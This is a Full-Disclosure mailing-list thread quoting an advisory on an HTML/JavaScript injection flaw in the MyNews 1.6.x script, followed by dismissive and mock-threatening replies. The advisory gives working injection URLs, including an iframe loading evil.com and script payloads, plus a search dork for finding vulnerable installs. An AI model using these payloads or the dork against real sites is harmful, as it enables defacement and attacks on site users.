SkyOut is a Fredrick Diggle Sec contributer... We suggest you think very carefully before insulting him further. Consider yourself on the list reepex.
On Feb 6, 2008 9:57 PM, reepex <[EMAIL PROTECTED]> wrote: > your 'disclosure' is lame and so is your site. Could you please never email > here again > > > > On Feb 6, 2008 1:06 PM, SkyOut <[EMAIL PROTECTED]> wrote: > > > I know its basic, but I am a supporter of FD and therefore > > planetluc.com has to be > > blamed now! I checked their script MyNews in version 1.6.4 today and > > then some > > other versions, all are vulnerable to HTML and JS injection. > > > > --- ADVISORY --- > > > > ---------------------------- > > || WWW.SMASH-THE-STACK.NET || > > ----------------------------- > > > > || ADVISORY: MyNews 1.6.X HTML/JS Injection Vulnerability > > > > _____________________ > > || 0x00: ABOUT ME > > || 0x01: DATELINE > > || 0x02: INFORMATION > > || 0x03: EXPLOITATION > > || 0x04: GOOGLE DORK > > || 0x05: RISK LEVEL > > ____________________________________________________________ > > ____________________________________________________________ > > > > _________________ > > || 0x00: ABOUT ME > > > > Author: SkyOut > > Date: February 2008 > > Contact: skyout[-at-]smash-the-stack[-dot-]net > > Website: http://www.smash-the-stack.net/ > > > > _________________ > > || 0x01: DATELINE > > > > 2008-02-06: Bug found > > 2008-02-06: Advisory released > > > > ____________________ > > || 0x02: INFORMATION > > > > The MyNews script by planetluc.com in all versions of the 1.6.X tree is > > vulnerable to HTML and JS injection due to no sanitation of the "hash" > > value in combination with the action "admin". > > > > _____________________ > > || 0x03: EXPLOITATION > > > > No exploit is needed to test this vulnerability. You just need a working > > web browser. > > > > 1: HTML Injection > > > > To make a HTML injectioni, visit the websites main page. The name > > might differ > > from the original name "mynews.inc.php", mostly its called > > "index.php". Now > > construct a malformed URL as follows: > > > > http://www.example.com/index.php?hash=";><iframe src=http:// > > www.evil.com/ height=500px width=500px></iframe><!--&do=admin > > > > Of course you can manipulate the values of "height" and "width" like you > > want to. Do it the way it best fits to your needs! > > > > 2: JavaScript Injection > > > > JS injection is similar to HTML injection, just that you put a JS code > > in the "hash" parameter. Let me show you two examples: > > > > http://www.example.com/index.php?hash=";><script>alert(1337);</ > > script><!--&do=admin > > > > or > > > > http://www.example.com/index.php?hash=";><script>alert("XSS");</ > > script><!--&do=admin > > > > Sometimes using strings doesn't work, so test it first! > > > > ____________________ > > || 0x04: GOOGLE DORK > > > > intext:"powered by MyNews 1.6.*" > > > > ___________________ > > || 0x05: RISK LEVEL > > > > - LOW - (1/3) - > > > > <!> Happy Hacking <!> > > > > ____________________________________________________________ > > ____________________________________________________________ > > > > THE END > > > > --- ADVISORY --- > > > > Sincerely, > > SkyOut > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
